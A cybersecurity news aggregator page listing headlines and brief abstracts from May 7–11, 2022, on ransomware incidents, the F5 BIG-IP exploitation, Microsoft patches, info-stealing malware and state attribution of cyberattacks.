Members of the Five Eyes (FVEY) intelligence alliance today warned managed service providers (MSPs) and their customers that they're increasingly targeted by supply chain attacks.BleepingComputer
May 11, 2022 – Attack
Healthcare Technology Provider Omnicell Discloses Ransomware Attack Full Text
Abstract
In its latest Form 10-Q filing with the SEC, the company noted that some of its internal systems were impacted by a ransomware attack on May 4, 2022. Certain of the company’s products and services were affected.Security Week
May 11, 2022 – Attack
Bitter cyberspies target South Asian govts with new malware Full Text
Abstract
New activity has been observed from Bitter, an APT group focused on cyberespionage, targeting the government of Bangladesh with new malware with remote file execution capabilities.BleepingComputer
May 11, 2022 – Business
Abnormal Security Raises $200 Million to Provide Email Security Solutions for Businesses Full Text
Abstract
Abnormal Security announced the close of a $210 million Series C round of financing led by global software investor Insight Partners, with participation from Greylock Partners and Menlo Ventures.Help Net Security
May 11, 2022 – Malware
New IceApple exploit toolset deployed on Microsoft Exchange servers Full Text
Abstract
Security researchers have found a new post-exploitation framework that they dubbed IceApple, deployed mainly on Microsoft Exchange servers across a wide geography.BleepingComputer
May 11, 2022 – General
Microsoft: The ransomware world is changing, here’s what you need to know Full Text
Abstract
Microsoft security teams are tracking more than 35 unique ransomware families and 250 threat actors across nation-state, ransomware and criminal activities. RaaS has forced Microsoft to look at attacks differently.ZDNet
May 11, 2022 – Government
E.U. Blames Russia for Cyberattack on KA-SAT Satellite Network Operated by Viasat Full Text
Abstract
The Five Eyes nations comprising Australia, Canada, New Zealand, the U.K., and the U.S., along with Ukraine and the European Union, formally pinned Russia for masterminding an attack on an international satellite communication (SATCOM) provider that had "spillover" effects across Europe. The cyber offensive, which took place one hour before the Kremlin's military invasion of Ukraine on February 24, targeted the KA-SAT satellite network operated by telecommunications company Viasat, crippling the operations of wind farms and internet users in central Europe. Viasat, in late March, disclosed that it had shipped nearly 30,000 modems to distributors to restore service to customers whose modems were rendered unusable. "This cyberattack had a significant impact causing indiscriminate communication outages and disruptions across several public authorities, businesses and users in Ukraine, as well as affecting several E.U. Member States," the CounciThe Hacker News
May 11, 2022 – Vulnerabilities
Microsoft Patch Tuesday updates for May 2022 fixes 3 zero-days, 1 under active attack Full Text
Abstract
Microsoft Patch Tuesday security updates for May 2022 address three zero-day vulnerabilities, one of them actively exploited. Microsoft Patch Tuesday security updates for May 2022 addressed three zero-day vulnerabilities, one of which is under active...Security Affairs
May 11, 2022 – General
Ransomware has gone down because sanctions against Russia are making life harder for attackers Full Text
Abstract
Ransomware attacks have long been a major cybersecurity issue for organisations around the world. The number of ransomware attacks has gone down in recent months because of increased sanctions against Russian cybercriminals.ZDNet
May 11, 2022 – Government
EU condemns Russian cyber operations against Ukraine Full Text
Abstract
The European Union condemns the cyberattacks conducted by Russia against Ukraine, which targeted the satellite KA-SAT network. The European Union accused Russia of the cyberattack that hit the satellite KA-SAT network in Ukraine, operated by Viasat,...Security Affairs
May 11, 2022 – Phishing
New Phishing-as-a-Service Toolkit Depends on Impersonation Scams Full Text
Abstract
Security analysts discovered a new underground service called Frappo, which is basically a Phishing-as-a-Service (PaaS), that lets cybercriminals host and launch sophisticated impersonation-based phishing scams. The cybercrime service was first seen on March 22, 2021. Given the rise in such threats ...Cyware Alerts - Hacker News
May 11, 2022 – Skimming
Caramel - New Credit Card Skimmer-as-a-Service Full Text
Abstract
A new credit card stealing service, called Caramel, is growing in popularity. Launched by a Russian cybercrime organization named CaramelCorp, the skimmer-as-a-service can allow any low-skilled threat actors to get started with financial fraud.Cyware Alerts - Hacker News
May 11, 2022 – Government
New Malspam Campaigns Propagate Jester Infostealer - Warns CERT-UA Full Text
Abstract
The CERT-UA warned against a phishing campaign that deploys Jester Stealer for data exfiltration from infected users’ devices. The email campaign carries the subject line "chemical attack." The malware cannot be analyzed in virtual machines as the malware developers have implemented anti-analysis cap ...Cyware Alerts - Hacker News
May 11, 2022 – Malware
DCRat Being Sold on Russian Hacking Forums at Dirt Cheap Rates Full Text
Abstract
Malware authors were spotted selling a capable trojan named DCRat on underground forums. The still-under-development threat comes equipped with a variety of information-stealing abilities. As for protection, always install a reliable anti-malware solution.Cyware Alerts - Hacker News
May 11, 2022 – Criminals
Conti’s Wrath Causes Havoc Across the Globe Full Text
Abstract
Conti becomes the most wanted cybercriminal gang right now on the dark web with the U.S. announcing a $15 million bounty for information on its members. The group has stirred national security concerns in Costa Rica. Further, Conti claims to have leaked intelligence data from the go ...Cyware Alerts - Hacker News
May 11, 2022 – Phishing
New Wave of Activities From Mustang Panda Full Text
Abstract
Mustang Panda is on a spree to launch phishing campaigns targeting European and Russian entities and using relevant news to lure potential victims. In some cases, the group has used summit- and conference-themed lures in Asia and Europe, and aims to gain as much long-term access to carry out cybere ...Cyware Alerts - Hacker News
May 11, 2022 – Malware
NetDooka Leverages PrivateLoader Distribution Service to Infect Victims Full Text
Abstract
The new NetDooka malware framework is being distributed by PrivateLoader’s PPI service that features a loader, a dropper, a protection driver, and a powerful NetDooka RAT. PrivateLoader PPI is a malware distribution platform that uses SEO poisoning and files uploaded to torrent sites.Cyware Alerts - Hacker News
May 11, 2022 – Malware
Raspberry Robin Worm Found Dropping Malware Full Text
Abstract
A new malware dubbed Raspberry Robin, having worm-like capabilities, is spreading via external USB drives to target several firms’ networks in the technology and manufacturing sectors. The worm abuses the Microsoft Standard Installer to make a connection to its C2 servers.Cyware Alerts - Hacker News
May 10, 2022 – Vulnerabilities
Critical F5 BIG-IP vulnerability exploited to wipe devices Full Text
Abstract
A recently disclosed F5 BIG-IP vulnerability has been used in destructive attacks, attempting to erase a device's file system and make the server unusable.BleepingComputer
May 10, 2022 – Vulnerabilities
Microsoft Releases Fix for New Zero-Day with May 2022 Patch Tuesday Updates Full Text
Abstract
Microsoft on Tuesday rolled out fixes for as many as 74 security vulnerabilities, including one for a zero-day bug that's being actively exploited in the wild. Of the 74 issues, seven are rated Critical, 66 are rated Important, and one is rated Low in severity. Two of the flaws are listed as publicly known at the time of release. These encompass 24 remote code execution (RCE), 21 elevation of privilege, 17 information disclosure, and six denial-of-service vulnerabilities, among others. The updates are in addition to 36 flaws patched in the Chromium-based Microsoft Edge browser on April 28, 2022. Chief among the resolved bugs is CVE-2022-26925 (CVSS score: 8.1), a spoofing vulnerability affecting the Windows Local Security Authority (LSA), which Microsoft describes as a "protected subsystem that authenticates and logs users onto the local system." "An unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller toThe Hacker News
May 10, 2022 – Attack
Critical F5 BIG-IP vulnerability targeted by destructive attacks Full Text
Abstract
A recently disclosed F5 BIG-IP vulnerability has been used in destructive attacks, attempting to erase a device's file system and make the server unusable.BleepingComputer
May 10, 2022 – General
Europe’s GDPR coincides with huge drop in Android apps Full Text
Abstract
Europe's data protection regime has reduced the number of apps available in Google Play by "a third," increased costs, and reduced developer revenues, according to a study published Monday.The Register
May 10, 2022 – Criminals
New REvil Samples Indicate Ransomware Gang is Back After Months of Inactivity Full Text
Abstract
The notorious ransomware operation known as REvil (aka Sodin or Sodinokibi) has resumed after six months of inactivity, an analysis of new ransomware samples has revealed. "Analysis of these samples indicates that the developer has access to REvil's source code, reinforcing the likelihood that the threat group has reemerged," researchers from Secureworks Counter Threat Unit (CTU) said in a report published Monday. "The identification of multiple samples with varying modifications in such a short period of time and the lack of an official new version indicates that REvil is under heavy active development once again." REvil, short for Ransomware Evil, is a ransomware-as-a-service (RaaS) scheme attributed to a Russia-based/speaking group known as Gold Southfield, arising just as GandCrab activity declined and the latter announced their retirement. It's also one of the earliest groups to adopt the double extortion scheme in which stolen data fromThe Hacker News
May 10, 2022 – Vulnerabilities
Microsoft fixed RCE flaw in a driver used by Azure Synapse and Data Factory Full Text
Abstract
Microsoft disclosed a now-fixed vulnerability in Azure Synapse and Azure Data Factory that could have allowed remote code execution. Microsoft announced that it has addressed a critical remote code execution flaw, tracked as CVE-2022-29972 and named SynLapse,...Security Affairs
May 10, 2022 – Government
UK cybersecurity center sent 33 million alerts to companies Full Text
Abstract
The NCSC (National Cyber Security Centre) in the UK reports having served 33 million alerts to organizations signed up for its "Early Warning" service. Additionally, the government agency has dealt with a record number of online scams in 2021, removing more than 2.7 million from the internet.BleepingComputer
May 10, 2022 – Vulnerabilities
QNAP Patches Critical Vulnerability in Network Surveillance Products Full Text
Abstract
QNAP says only VS series NVR devices running QVR are impacted and that the issue was addressed with the release of QVR 5.1.6 build 20220401. The manufacturer encourages all users to update their systems to the latest release.Security Week
May 10, 2022 – General
5 Benefits of Detection-as-Code Full Text
Abstract
TL;DR: Adopt a modern, test-driven methodology for securing your organization with Detection-as-Code. Over the past decade, threat detection has become business-critical and even more complicated. As businesses move to the cloud, manual threat detection processes are no longer able to keep up. How can teams automate security analysis at scale and address the challenges that threaten business objectives? The answer lies in treating threat detections like software or detection-as-code. Watch Panther's On-Demand Webinar: Scaling Security with Detection-as-Code with Cedar to find out how Cedar uses Panther to leverage Detection-as-Code to build high-signal alerts. Detection-as-Code: A New (Hope) Paradigm Detections define logic for analyzing security log data to identify attacker behaviors. When a rule is matched, an alert gets sent to your team for containment or investigation. What is detection-as-code? Detection-as-Code is a modern, flexible, and structured approach to writThe Hacker News
May 10, 2022 – Breach
Hacktivists hacked Russian TV schedules during Victory Day and displayed anti-war messages Full Text
Abstract
Hacktivists yesterday defaced Russian TV with pro-Ukraine messages and took down the RuTube video streaming site. Hacktivists and white hat hackers continue to support Ukraine against the Russian invasion; in a recent attack, they defaced Russian...Security Affairs
May 10, 2022 – Solution
GitHub announces enhanced 2FA experience for npm accounts Full Text
Abstract
Today, GitHub has launched a new public beta to notably improve the two-factor authentication (2FA) experience for all npm user accounts.BleepingComputer
May 10, 2022 – Criminals
Cybercriminals Are Increasingly Exploiting Vulnerabilities in Windows Print Spooler Full Text
Abstract
Over the past year, various vulnerabilities in Windows Print Spooler have been discovered. By abusing them, cybercriminals have been able to take control of servers and victims’ machines, even without special admin access.Dark Reading
May 10, 2022 – Malware
Experts Detail Saintstealer and Prynt Stealer Info-Stealing Malware Families Full Text
Abstract
Cybersecurity researchers have dissected the inner workings of an information-stealing malware called Saintstealer that's designed to siphon credentials and system information. "After execution, the stealer extracts username, passwords, credit card details, etc.," Cyble researchers said in an analysis last week. "The stealer also steals data from various locations across the system and compresses it in a password-protected ZIP file." A 32-bit C# .NET-based executable with the name "saintgang.exe," Saintstealer is equipped with anti-analysis checks, opting to terminate itself if it's running either in a sandboxed or virtual environment. The malware can capture a wide range of information that ranges from taking screenshots to gathering passwords, cookies, and autofill data stored in Chromium-based browsers such as Google Chrome, Opera, Edge, Brave, Vivaldi, and Yandex, among others. It can also steal Discord multi-factor authentication tokeThe Hacker News
May 10, 2022 – Attack
Threat actors are actively exploiting CVE-2022-1388 RCE in F5 BIG-IP Full Text
Abstract
Threat actors are exploiting critical F5 BIG-IP flaw CVE-2022-1388 to deliver malicious code, cybersecurity researchers warn. Threat actors started massively exploiting the critical remote code execution vulnerability, tracked as CVE-2022-1388,...Security Affairs
May 10, 2022 – Vulnerabilities
Microsoft fixes new NTLM relay zero-day in all Windows versions Full Text
Abstract
Microsoft has addressed an actively exploited Windows LSA spoofing zero-day that unauthenticated attackers can exploit remotely to force domain controllers to authenticate them via the Windows NT LAN Manager (NTLM) security protocol.BleepingComputer
May 10, 2022 – Business
Microsoft Flexes Security Vendor Muscles With Managed Services Full Text
Abstract
Microsoft rolled out a new suite of managed services aimed at the mid-market, betting that short-staffed organizations will need outside help to reduce bloating attack surfaces and mitigate an ongoing surge in malware attacks.Security Week
May 10, 2022 – Vulnerabilities
Microsoft Mitigates RCE Vulnerability Affecting Azure Synapse and Data Factory Full Text
Abstract
Microsoft on Monday disclosed that it mitigated a security flaw affecting Azure Synapse and Azure Data Factory that, if successfully exploited, could result in remote code execution. The vulnerability, tracked as CVE-2022-29972, has been codenamed "SynLapse" by researchers from Orca Security, who reported the flaw to Microsoft in January 2022. "The vulnerability was specific to the third-party Open Database Connectivity (ODBC) driver used to connect to Amazon Redshift in Azure Synapse pipelines and Azure Data Factory Integration Runtime (IR) and did not impact Azure Synapse as a whole," the company said. "The vulnerability could have allowed an attacker to perform remote command execution across IR infrastructure not limited to a single tenant." In other words, a malicious actor could weaponize the bug to acquire the Azure Data Factory service certificate and access another tenant's Integration Runtimes to gain access to sensitive informaThe Hacker News
May 10, 2022 – Phishing
Exclusive: Welcome “Frappo” – Resecurity identified a new Phishing-as-a-Service Full Text
Abstract
The Resecurity HUNTER unit identified a new underground service called 'Frappo', which is available on the Dark Web. “Frappo” acts as a Phishing-as-a-Service and gives cybercriminals the ability to host and generate high-quality phishing pages...Security Affairs
May 10, 2022 – Vulnerabilities
Microsoft May 2022 Patch Tuesday fixes 3 zero-days, 75 flaws Full Text
Abstract
Today is Microsoft's May 2022 Patch Tuesday, and with it comes fixes for three zero-day vulnerabilities, with one actively exploited, and a total of 75 flaws.BleepingComputer
May 10, 2022 – Policy and Law
U.S. Proposes $1 Million Fine on Colonial Pipeline for Safety Violations After Cyberattack Full Text
Abstract
The U.S. Department of Transportation's Pipeline and Hazardous Materials Safety Administration (PHMSA) has proposed a penalty of nearly $1 million to Colonial Pipeline for violating federal safety regulations, worsening the impact of the ransomware attack last year. The $986,400 penalty is the result of an inspection conducted by the regulator of the pipeline operator's control room management (CRM) procedures from January through November 2020. The PHMSA said that "a probable failure to adequately plan and prepare for manual shutdown and restart of its pipeline system [...] contributed to the national impacts when the pipeline remained out of service after the May 2021 cyberattack." Colonial Pipeline, operator of the largest U.S. fuel pipeline, was forced to temporarily take its systems offline in the wake of a DarkSide ransomware attack in early May 2021, disrupting gas supply and prompting a regional emergency declaration across 17 states. The incidenThe Hacker News
May 10, 2022 – Attack
FluBot Android malware targets Finland in new SMS campaigns Full Text
Abstract
Finland's National Cyber Security Center (NCSC-FI) has issued a warning about the FluBot Android malware infections increasing due to a new campaign that relies on SMS and MMS for distribution. – BleepingComputer
May 10, 2022 – Solution
UK govt releases free tool to check for email cybersecurity risks Full Text
Abstract
The United Kingdom's National Cyber Security Centre (NCSC) today released a new email security check service to help organizations easily identify vulnerabilities that could allow attackers to spoof emails or can lead to email privacy breaches. – BleepingComputer
May 10, 2022 – Attack
German automakers targeted in year-long malware campaign Full Text
Abstract
A years-long phishing campaign has targeted German companies in the automotive industry, attempting to infect their systems with password-stealing malware. – BleepingComputer
May 10, 2022 – Government
US, EU blame Russia for cyberattack on satellite modems in Ukraine Full Text
Abstract
The European Union formally accused Russia of coordinating the cyberattack that hit satellite Internet modems in Ukraine on February 24, roughly one hour before Russia invaded Ukraine. – BleepingComputer
May 9, 2022 – Government
FBI: Rise in Business Email-based Attacks is a $43B Headache Full Text
Abstract
A huge spike in fraudulent activities related to attacks leveraging business email accounts is a billion-dollar problem. – Threatpost
May 09, 2022 – Vulnerabilities
Critical Gems Takeover Bug Reported in RubyGems Package Manager Full Text
Abstract
The maintainers of the RubyGems package manager have addressed a critical security flaw that could have been abused to remove gems and replace them with rogue versions under specific circumstances. "Due to a bug in the yank action, it was possible for any RubyGems.org user to remove and replace certain gems even if that user was not authorized to do so," RubyGems said in a security advisory published on May 6, 2022. RubyGems, like npm for JavaScript and pip for Python, is a package manager and a gem hosting service for the Ruby programming language, offering a repository of more than 171,500 libraries. In a nutshell, the flaw in question, tracked as CVE-2022-29176, enabled anyone to pull certain gems and upload different files with the same name, same version number, and different platforms. For this to happen, however, a gem needed to have one or more dashes in its name, where the word before the dash was the name of an attacker-controlled gem, and which was create – The Hacker News
May 09, 2022 – Outage
Lincoln College to close after 157 years due to ransomware attack Full Text
Abstract
Lincoln College, a liberal-arts school from rural Illinois, says it will close its doors later this month, 157 years since it was founded and following a hard hit on its finances after the COVID-19 pandemic and a recent ransomware attack. – BleepingComputer
May 9, 2022 – Ransomware
DarkAngels: A Rebranded Version of Babuk? Full Text
Abstract
Researchers have identified DarkAngels, a new ransomware that bears an uncanny resemblance to the Babuk ransomware. It excludes file extensions such as .exe, .dll, and .babyk from encryption. Organizations are recommended to use reliable anti-malware and internet security solutions. – Cyware Alerts - Hacker News
May 09, 2022 – Malware
Experts Sound Alarm on DCRat Backdoor Being Sold on Russian Hacking Forums Full Text
Abstract
Cybersecurity researchers have shed light on an actively maintained remote access trojan called DCRat (aka DarkCrystal RAT) that's offered on sale for "dirt cheap" prices, making it accessible to professional cybercriminal groups and novice actors alike. "Unlike the well-funded, massive Russian threat groups crafting custom malware [...], this remote access Trojan (RAT) appears to be the work of a lone actor, offering a surprisingly effective homemade tool for opening backdoors on a budget," BlackBerry researchers said in a report shared with The Hacker News. "In fact, this threat actor's commercial RAT sells at a fraction of the standard price such tools command on Russian underground forums." Written in .NET by an individual codenamed "boldenis44" and "crystalcoder," DCRat is a full-featured backdoor whose functionalities can be further augmented by third-party plugins developed by affiliates using a dedicated integrated – The Hacker News
May 9, 2022 – Malware
DCRat, only $5 for a fully working remote access trojan Full Text
Abstract
Researchers warn of a remote access trojan called DCRat (aka DarkCrystal RAT) that is available for sale on Russian cybercrime forums. Cybersecurity researchers from BlackBerry are warning of a remote access trojan called DCRat (aka DarkCrystal RAT)... – Security Affairs
May 9, 2022 – Insider Threat
Cloud Tech Powers the Hybrid-remote Workforce — and Increases Insider Risk Full Text
Abstract
Cybersecurity practitioners are sounding the alarm bells. Amplified by the not-going-away-anytime-soon Great Resignation and the here-to-stay shift to hybrid-remote work models, Insider Risk sees exponential growth. – Threatpost
May 09, 2022 – Hacker
Hackers display “blood is on your hands” on Russian TV, take down RuTube Full Text
Abstract
Hackers continue to target Russia with cyberattacks, defacing Russian TV to show pro-Ukrainian messages and taking down the RuTube video streaming site. – BleepingComputer
May 9, 2022 – Vulnerabilities
Critical Flaw Identified in F5 BIG-IP Devices Full Text
Abstract
Security researchers issued an alert to F5 BIG-IP admins to immediately update their devices after creating exploits for a recently disclosed critical CVE-2022-1388, an RCE flaw. The vulnerable devices are mostly used in the enterprise and may allow attackers to exploit the flaw for gaining initial ... Read More – Cyware Alerts - Hacker News
May 09, 2022 – Government
SHIELDS UP in bite sized chunks Full Text
Abstract
Unless you are living completely off the grid, you know the horrifying war in Ukraine and the related geopolitical tensions have dramatically increased cyberattacks and the threat of even more to come. The Cybersecurity and Infrastructure Security Agency (CISA) provides guidance to US federal agencies in their fight against cybercrime, and the agency's advice has proven so valuable that it's been widely adopted by commercial organizations too. In February, CISA responded to the current situation by issuing an unusual "SHIELDS UP!" warning and advisory. According to CISA, "Every organization—large and small—must be prepared to respond to disruptive cyber incidents." The announcement from CISA consisted of a range of recommendations to help organizations and individuals reduce the likelihood of a successful attack and limit damage in case the worst happens. It also contains general advice for C-level leaders, as well as a tip sheet on how to respond to r – The Hacker News
May 9, 2022 – Attack
CERT-UA warns of malspam attacks distributing the Jester info stealer Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) warns of attacks spreading info-stealing malware Jester Stealer. The Computer Emergency Response Team of Ukraine (CERT-UA) has detected malspam campaigns aimed at spreading an info-stealer... – Security Affairs
May 09, 2022 – Vulnerabilities
Microsoft releases fixes for Azure flaw allowing RCE attacks Full Text
Abstract
Microsoft has released security updates to address a security flaw affecting Azure Synapse and Azure Data Factory pipelines that could let attackers execute remote commands across Integration Runtime infrastructure. – BleepingComputer
May 9, 2022 – Criminals
Emotet is Testing New Attack Chain Full Text
Abstract
Proofpoint researchers have spotted low-volume Emotet activity that is much different from typical Emotet threat behaviors, and it is highly likely that the group is testing a new threat before using it. The campaign was spotted between April 4 and April 19. The testing of different attack chains is mo ... Read More – Cyware Alerts - Hacker News
May 09, 2022 – Malware
Another Set of Joker Trojan-Laced Android Apps Resurfaces on Google Play Store Full Text
Abstract
A new set of trojanized apps spread via the Google Play Store has been observed distributing the notorious Joker malware on compromised Android devices. Joker, a repeat offender, refers to a class of harmful apps that are used for billing and SMS fraud, while also performing a number of actions of a malicious hacker's choice, such as stealing text messages, contact lists, and device information. Despite continued attempts on the part of Google to scale up its defenses, the apps have been continually iterated to search for gaps and slip into the app store undetected. "They're usually spread on Google Play, where scammers download legitimate apps from the store, add malicious code to them and re-upload them to the store under a different name," Kaspersky researcher Igor Golovin said in a report published last week. The trojanized apps, taking the place of their removed counterparts, often appear as messaging, health tracking, and PDF scanner apps that, once – The Hacker News
May 9, 2022 – Vulnerabilities
Experts developed exploits for CVE-2022-1388 RCE in F5 BIG-IP products Full Text
Abstract
A few days after F5 addressed the critical CVE-2022-1388 Remote Code execution flaw in its BIG-IP products, researchers created exploits for it. Last week security and application delivery solutions provider F5 released its security notification to inform... – Security Affairs
May 09, 2022 – Phishing
Ukraine warns of “chemical attack” phishing pushing stealer malware Full Text
Abstract
Ukraine's Computer Emergency Response Team (CERT-UA) is warning of the mass distribution of Jester Stealer malware via phishing emails using warnings of impending chemical attacks to scare recipients into opening attachments. – BleepingComputer
May 9, 2022 – Education
‘A tragedy’: Closure of 150-year-old college underscores toll of ransomware attacks Full Text
Abstract
A goodbye note posted to the school's website said that it survived both World Wars, the Spanish flu and the Great Depression, but was unable to handle the combination of the Covid pandemic and a severe ransomware attack in December last year. – NBC News
May 09, 2022 – Attack
Ukrainian CERT Warns Citizens of a New Wave of Attacks Distributing Jester Malware Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of phishing attacks that deploy an information-stealing malware called Jester Stealer on compromised systems. The mass email campaign carries the subject line "chemical attack" and contains a link to a macro-enabled Microsoft Excel file, opening which leads to computers getting infected with Jester Stealer. The attack, which requires potential victims to enable macros after opening the document, works by downloading and executing an .EXE file that is retrieved from compromised web resources, CERT-UA detailed. Jester Stealer, which was first documented by Cyble in February 2022, comes with features to steal and transmit login credentials, cookies, and credit card information along with data from passwords managers, chat messengers, email clients, crypto wallets, and gaming apps to the attackers. "The hackers get the stolen data via Telegram using statically configured proxy addresses (e.g., with – The Hacker News
May 9, 2022 – Attack
Experts uncovered a new wave of attacks conducted by Mustang Panda Full Text
Abstract
China-linked Mustang Panda APT group targets entities in Asia, the European Union, Russia, and the US in a new wave of attacks. In February 2022, Cisco Talos researchers started observing China-linked cyberespionage group Mustang Panda conducting... – Security Affairs
May 09, 2022 – Hacker
Hackers exploiting critical F5 BIG-IP bug, public exploits released Full Text
Abstract
Threat actors have started massively exploiting the critical vulnerability tracked as CVE-2022-1388, which affects multiple versions of all F5 BIG-IP modules, to drop malicious payloads. – BleepingComputer
May 9, 2022 – Business
Near $1 Million Fine Proposed for Colonial Pipeline Following Cyber Attack Full Text
Abstract
The U.S. Department of Transportation's Pipeline and Hazardous Materials Safety Administration (PHMSA) found management failings and has issued a Notice of Probable Violation and Proposed Compliance Order to Colonial Pipeline Company. – HS Today
May 09, 2022 – Malware
Hackers are now hiding malware in Windows Event Logs Full Text
Abstract
Security researchers have noticed a malicious campaign that used Windows event logs to store malware, a technique that has not been previously documented publicly for attacks in the wild. – BleepingComputer
May 09, 2022 – Attack
Costa Rica declares national emergency after Conti ransomware attacks Full Text
Abstract
The Costa Rican President Rodrigo Chaves has declared a national emergency following cyber attacks from Conti ransomware group. BleepingComputer also observed Conti published most of the 672 GB dump that appears to contain data belonging to the Costa Rican government agencies. – BleepingComputer
May 08, 2022 – Criminals
U.S. Offering $10 Million Reward for Information on Conti Ransomware Hackers Full Text
Abstract
The U.S. State Department has announced rewards of up to $10 million for any information leading to the identification of key individuals who are part of the infamous Conti cybercrime gang. Additionally, it's offering another $5 million for intelligence information that could help arrest or convict individuals who are conspiring or attempting to affiliate with the group in a ransomware attack. The department called the Conti variant the "costliest strain of ransomware ever documented." Conti, the work of a Russia-based transnational organized crime group dubbed Gold Ulrick, is one of the most prolific ransomware cartels and has continued to strike entities globally while simultaneously expanding its empire by absorbing TrickBot and running side hustles that involve data extortion. After the syndicate expressed public support for Russia's invasion of Ukraine in February, it suffered a major breach of its own after its source code and internal chats were released – The Hacker News
May 08, 2022 – Vulnerabilities
Researchers Develop RCE Exploit for the Latest F5 BIG-IP Vulnerability Full Text
Abstract
Days after F5 released patches for a critical remote code execution vulnerability affecting its BIG-IP family of products, security researchers are warning that they were able to create an exploit for the shortcoming. Tracked as CVE-2022-1388 (CVSS score: 9.8), the flaw relates to an iControl REST authentication bypass that, if successfully exploited, could lead to remote code execution, allowing an attacker to gain initial access and take control of an affected system. This could range anywhere from deploying cryptocurrency miners to deploying web shells for follow-on attacks, such as information theft and ransomware. "We have reproduced the fresh CVE-2022-1388 in F5's BIG-IP," cybersecurity company Positive Technologies said in a tweet on Friday. "Patch ASAP!" The critical security vulnerability impacts the following versions of BIG-IP products: 16.1.0 - 16.1.2; 15.1.0 - 15.1.5; 14.1.0 - 14.1.4; 13.1.0 - 13.1.4; 12.1.0 - 12.1.6; 11.6.1 - 11.6.5. Fix – The Hacker News
May 08, 2022 – Vulnerabilities
Check your gems: RubyGems fixes unauthorized package takeover bug Full Text
Abstract
The RubyGems package repository has fixed a critical vulnerability that would allow anyone to unpublish ("yank") certain Ruby packages from the repository and republish their tainted or malicious versions with the same file names and version numbers. – BleepingComputer
May 8, 2022 – Attack
Conti ransomware claims to have hacked Peru MOF – Dirección General de Inteligencia (DIGIMIN) Full Text
Abstract
Conti Ransomware gang claims to have hacked the Peru MOF - Dirección General de Inteligencia (DIGIMIN) and stolen 9.41 GB. The Conti ransomware gang added the Peru MOF - Dirección General de Inteligencia (DIGIMIN) to the list of its victims on its Tor leak... – Security Affairs
May 08, 2022 – Vulnerabilities
Exploits created for critical F5 BIG-IP flaw, install patch immediately Full Text
Abstract
Security researchers are warning F5 BIG-IP admins to immediately install the latest security updates after creating exploits for a recently disclosed critical CVE-2022-1388 remote code execution vulnerability. – BleepingComputer
May 8, 2022 – General
May 01 – May 07 Ukraine – Russia the silent cyber conflict Full Text
Abstract
This post provides a timeline of the events related to Russia's invasion of Ukraine from the cyber security perspective. Below is the timeline of the events related to the ongoing Russian invasion that occurred in the previous weeks: May 06 - Anonymous... – Security Affairs
May 08, 2022 – Criminals
Caramel credit card stealing service is growing in popularity Full Text
Abstract
A credit card stealing service is growing in popularity, allowing any low-skilled threat actors an easy and automated way to get started in the world of financial fraud. – BleepingComputer
May 8, 2022 – Government
NIST published updated guidance for supply chain risks Full Text
Abstract
The National Institute of Standards and Technology (NIST) has released updated guidance for defending against supply-chain attacks. The National Institute of Standards and Technology (NIST) has released updated guidance for defending against supply... – Security Affairs
May 8, 2022 – Attack
US agricultural machinery manufacturer AGCO suffered a ransomware attack Full Text
Abstract
The American agricultural machinery manufacturer AGCO announced that it has suffered a ransomware attack that impacted its production facilities. AGCO, one of the most important agricultural machinery manufacturers, announced that a ransomware... – Security Affairs
May 8, 2022 – General
Security Affairs newsletter Round 364 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs, free in your inbox. If you also want to receive the free newsletter covering the international press, subscribe here... – Security Affairs
May 8, 2022 – Government
US DoS offers a reward of up to $15M for info on Conti ransomware gang Full Text
Abstract
The US Government offers up to $15 million for information that helps identify and locate leadership and co-conspirators of the Conti ransomware gang. The US Department of State offers up to $15 million for information that helps identify and locate... – Security Affairs
May 7, 2022 – Criminals
U.S. Offers $15 Million Reward for Information on Conti Ransomware Group Full Text
Abstract
The United States State Department has offered a reward of up to $15 million for information on the Russia-based Conti ransomware group, which has been blamed for cyber extortion attacks worldwide. – Reuters
May 7, 2022 – APT
Researchers Associate North-Korean APT38 Group with More Ransomware Strains Full Text
Abstract
A threat researcher from Trellix claimed that APT38 operators (aka Unit 180 of North Korea) have used Beaf, ZZZZ, ChiChi, and PXJ ransomware strains to extort some of their victims. – Cyware Alerts - Hacker News
May 7, 2022 – Vulnerabilities
DLL Hijacking Bug Puts a Hole in Prominent Ransomware Families Full Text
Abstract
A researcher named hyp3rlinx claims that several malware samples are exposed to DLL hijacking, a method used to inject malicious code into a genuine app. The bug could be exploited to stop file encryption. – Cyware Alerts - Hacker News
May 07, 2022 – Phishing
Fake crypto giveaways steal millions using Elon Musk Ark Invest video Full Text
Abstract
Fake cryptocurrency giveaways are stealing millions of dollars simply by replaying old Elon Musk and Jack Dorsey Ark Invest videos on YouTube. – BleepingComputer
May 7, 2022 – APT
UNC3524 APT Has Got Backdoors, Persistency Tactics Under Its Sleeves Full Text
Abstract
Experts noted that UNC3524 has been persistently targeting the emails of employees in the corporate world that focus on development, mergers and acquisitions, and large transactions, with financial motivation. – Cyware Alerts - Hacker News
May 07, 2022 – Vulnerabilities
Trend Micro antivirus modified Windows registry by mistake — How to fix Full Text
Abstract
Trend Micro antivirus has fixed a false positive affecting its Apex One endpoint security solution that caused Microsoft Edge updates to be tagged as malware and the Windows registry to be incorrectly modified. – BleepingComputer
May 07, 2022 – Ransomware
US offers $15 million reward for info on Conti ransomware gang Full Text
Abstract
The US Department of State is offering up to $15 million for information that helps identify and locate leadership and co-conspirators of the infamous Conti ransomware gang. – BleepingComputer
May 7, 2022 – Malware
Raspberry Robin spreads via removable USB devices Full Text
Abstract
Researchers discovered a new Windows malware, dubbed Raspberry Robin, with worm-like capabilities that spreads via removable USB devices. Cybersecurity researchers from Red Canary have spotted a new Windows malware, dubbed Raspberry Robin, with worm-like... – Security Affairs
May 7, 2022 – Malware
Malware campaign hides a shellcode into Windows event logs Full Text
Abstract
Experts spotted a malware campaign that is the first known to use the technique of hiding shellcode in Windows event logs. In February 2022 researchers from Kaspersky spotted a malicious campaign using a novel technique that consists of hiding the shellcode... – Security Affairs
May 7, 2022 – APT
US gov sanctions cryptocurrency mixer Blender also used by North Korea-linked Lazarus APT Full Text
Abstract
The U.S. Department of Treasury sanctioned cryptocurrency mixer Blender.io used by North Korea-linked Lazarus APT. The U.S. Department of Treasury sanctioned the cryptocurrency mixer Blender.io used by the North Korea-linked Lazarus APT to launder... – Security Affairs
May 7, 2022 – Breach
